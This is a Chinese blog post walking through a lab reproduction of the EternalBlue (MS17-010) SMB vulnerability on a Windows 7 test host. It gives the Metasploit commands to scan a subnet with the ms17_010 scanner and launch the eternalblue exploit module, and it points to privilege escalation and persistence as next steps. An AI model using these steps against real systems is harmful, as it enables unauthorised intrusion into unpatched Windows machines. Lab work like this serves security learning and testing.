原理:永恒之蓝通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞、恶意代码会扫描开放445文件共享端口的windows机器

受影响版本:windows2000、windows xp、windows2003、windows 7、windows 8、windows 2008等版本

漏洞复现:
首先该漏洞是由SMB协议引发的,所以在win7中设置防火墙入站规则,需要打开SMB协议打印机共享。
永恒之蓝(ms17_010)漏洞复现
然后在kali端启动msf
永恒之蓝(ms17_010)漏洞复现

使用扫描模块扫描目标网段,查看是否有主机存在该漏洞
use auxiliary/scanner/smb/smb_ms17_010
查看哪些参数需要设置
show options
永恒之蓝(ms17_010)漏洞复现
其中,required为yes的参数是需要设置的,no一般使用默认值
设置扫描网段
set rhosts 192.168.198.0/24
设置线程
set threads 50
执行
run

永恒之蓝(ms17_010)漏洞复现
发现192.168.198.132这台机子可能存在该漏洞,于是使用攻击模块,show exploit指令可以查看有哪些攻击模块可以使用,其中里面参数reserve表示等待对方连接我的服务器
bind表示我的服务器连接目标机
reverse_tcp_rc4表示用rc4进行加密,以增加通过防火墙的安全能力
bing相关的载荷:若远程溢出的程序在外网而我在内网,就不能使对方连接我的服务器而应该是我主动连接对方的服务器
我们使用windows/smb/ms17_010_eternalblue这个攻击模块
设置被攻击主机
set rhosts 192.168.198.132
进行攻击
exploit
永恒之蓝(ms17_010)漏洞复现

可见攻击成功,能执行命令,接下来就是提权和载荷持久化的操作了。

相关文章:

  • 2021-11-26
  • 2021-07-01
  • 2022-01-13
  • 2021-10-04
  • 2021-11-15
  • 2022-12-23
  • 2022-12-23
  • 2021-06-01
猜你喜欢
  • 2021-05-19
  • 2021-04-01
  • 2021-07-25
  • 2021-11-07
  • 2021-12-28
相关资源
相似解决方案